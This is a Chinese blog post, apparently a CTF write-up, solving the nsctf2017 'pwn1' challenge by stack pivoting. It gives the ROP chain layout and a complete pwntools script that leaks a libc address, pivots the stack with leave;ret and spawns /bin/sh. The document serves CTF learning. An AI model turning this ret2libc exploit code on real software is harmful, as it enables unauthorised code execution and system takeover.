2019-11-22栈迁移摸鱼

作者: 好大一只免孑 | 来源:发表于2019-11-23 22:25 被阅读0次

2019-11-22栈迁移摸鱼
pwn-栈迁移：
java8的函数式接口(Functional Interface
父亲的康复日记63
Android：Navigation组件（附加：与BottomN
2022-11-17
SpringCloudAlibaba(三)：使用Nacos作为配
小帅的Scalers Talk第五轮新概念朗读持续力训练Day1
我们是如何从ng1迁移ing到vue的
Sublime Text3关于react的插件——react语法

叹气好累

是nsctf2017 的pwn1
只开了nx
程序主逻辑：

读入100输出100，但实际buf只有88，存在溢出点，我用栈迁移做的

栈的构造如下：
rop1
[
'A'*(0x88+4),
puts_plt,
pop_ebp_ret,
main_got,
read_plt,
pop3_ret,
0,
buf1,
100,
pop_ebp_ret,
buf1-4,
leave_ret
]
rop2
[
gets,
system,
buf2,
buf2
]

这道题有个比较坑的点在于第一个获取的sh.recvline()并不是正确地址，正确地址的位置需要疯狂循环去找一下
最后找到读取的位置应该是u32(sh.recv()[71:75])

from pwn import *
#context.log_level="debug"

sh=process('./pwn1')
libc=ELF('/lib32/libc.so.6')
elf=ELF('./pwn1')

buf=0x0804b000
buf1_add=buf-100
buf2_add=buf-500

leave_ret=0x080484b8
pop1_ret=0x080483c5
pop3_ret=0x0804865d
pop_ebp_ret=0x0804865f

read_plt_add= elf.symbols['read']
puts_plt_add=elf.symbols['puts']
puts_got_add=elf.got['puts']
mian_got_add=elf.got['__libc_start_main']



libc_system=libc.symbols['system']
libc_gets=libc.symbols['gets']
libc_main=libc.symbols['__libc_start_main']
libc_puts=libc.symbols['puts']
print 'mian='+hex(libc_main)


p1='A'*(0x88+4)
p1+=p32(puts_plt_add)+p32(pop_ebp_ret)+p32(mian_got_add)
p1+=p32(read_plt_add)+p32(pop3_ret)+p32(0)+p32(buf1_add)+p32(0x50)
p1+=p32(pop_ebp_ret)+p32(buf1_add-4)+p32(leave_ret)
sh.recvuntil(':')
sh.sendline(p1)

sh.recvline()
sh.recvline()
# tmp=sh.recvline()
# for i in range(len(tmp)):
#     print hex(u32(tmp[i:i+4]))
mian_real_add=u32(sh.recv()[71:75])
print hex(mian_real_add)

libc_add=mian_real_add-libc_main
system_real_add=libc_add+libc_system
gets_real_add=libc_add+libc_gets

p2=p32(gets_real_add)+p32(system_real_add)+p32(buf2_add)+p32(buf2_add)
sh.sendline(p2)
sh.sendline('/bin/sh\x00')

sh.interactive()

打过去后能操作的时间非常短，需要手速